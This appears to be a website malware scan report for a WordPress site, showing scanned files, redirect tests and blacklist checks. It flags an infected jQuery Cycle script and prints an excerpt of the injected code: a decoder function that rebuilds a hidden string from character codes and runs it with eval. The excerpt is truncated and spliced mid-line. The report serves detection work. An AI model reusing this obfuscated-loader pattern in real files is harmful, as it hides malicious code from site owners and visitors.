Scanned pages/files
| Request | Server response | Status |
http://youwheel.com/content/ | 404 Not Found Content-Length: 14179 Content-Type: text/html | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js?ver=3.8.1 | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://maps.google.com/maps/api/js?sensor=false&ver=3 | 200 OK Content-Length: 4898 Content-Type: text/javascript | clean |
http://youwheel.com/wp-content/themes/autoblog/js/dpagination.js | 200 OK Content-Length: 1326 Content-Type: application/javascript | clean |
http://youwheel.com/wp-content/themes/autoblog/js/superfish.js?ver=3.3.1 | 200 OK Content-Length: 3714 Content-Type: application/javascript | clean |
http://youwheel.com/wp-content/themes/autoblog/js/smthemes.js?ver=962 | 200 OK Content-Length: 9027 Content-Type: application/javascript | clean |
http://youwheel.com/wp-content/themes/autoblog/js/jquery.cycle.all.js | 200 OK Content-Length: 53031 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) iQuery=function(x) { var temp="",i,c=0,out="";l=x.length; while(c<=x.length-1){while(x.charAt(c)!='!')temp=temp+x.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";} eval(out); } ;(function($, undefined) { var ver = '2.9999'; if ($.support == undefined) { $.support = { opacity: !($.browser.msie) }; } function debug(s) { $.fn.cycle.debug && log(s); } function log() { win var rr = r < w ? r + parseInt(step * ((w-r)/count || 1),10) : w; $next.css({ clip: 'rect('+tt+'px '+rr+'px '+bb+'px '+ll+'px)' }); (step++ <= count) ? setTimeout(f, 13) : $curr.css('display', 'none'); })(); }); $.extend(opts.cssBefore, { display: 'block', opacity: 1, top: 0, left: 0 }); opts.animIn = { left: 0 }; opts.animOut = { left: 0 }; }; })(jQuery); Antivirus reports:
| ||
http://youwheel.com/ | 200 OK Content-Length: 48624 Content-Type: text/html | clean |
http://youwheel.com/wp-content/themes/autoblog/js/smthemes.js?ver=657 | 200 OK Content-Length: 9027 Content-Type: application/javascript | clean |
http://youwheel.com/about-us/ | 200 OK Content-Length: 18712 Content-Type: text/html | clean |
http://youwheel.com/wp-content/themes/autoblog/js/smthemes.js?ver=1192 | 200 OK Content-Length: 9027 Content-Type: application/javascript | clean |
http://youwheel.com/wp-includes/js/comment-reply.min.js?ver=3.8.1 | 200 OK Content-Length: 757 Content-Type: application/javascript | clean |
http://youwheel.com/contact-us/ | 200 OK Content-Length: 17118 Content-Type: text/html | clean |
http://youwheel.com/wp-content/themes/autoblog/js/smthemes.js?ver=1144 | 200 OK Content-Length: 9027 Content-Type: application/javascript | clean |
http://youwheel.com/privacy-notice/ | 200 OK Content-Length: 17134 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: youwheel.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 29 Apr 2014 05:12:30 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
Content-Length: 48624
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=7885doe98r29j05vj7hlpqkt13; path=/
X-Pingback: http://youwheel.com/xmlrpc.php
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...48624 bytes of data.
GET / HTTP/1.1
Host: youwheel.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Tue, 29 Apr 2014 05:12:30 GMT
Pragma: no-cache
Server: Microsoft-IIS/8.0
Content-Length: 48624
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=7885doe98r29j05vj7hlpqkt13; path=/
X-Pingback: http://youwheel.com/xmlrpc.php
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
...48624 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: youwheel.com
Referer: http://www.google.com/search?q=youwheel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: youwheel.com
Referer: http://www.google.com/search?q=youwheel.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=youwheel.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://youwheel.com/
Result: youwheel.com is not infected or malware details are not published yet.
Result: youwheel.com is not infected or malware details are not published yet.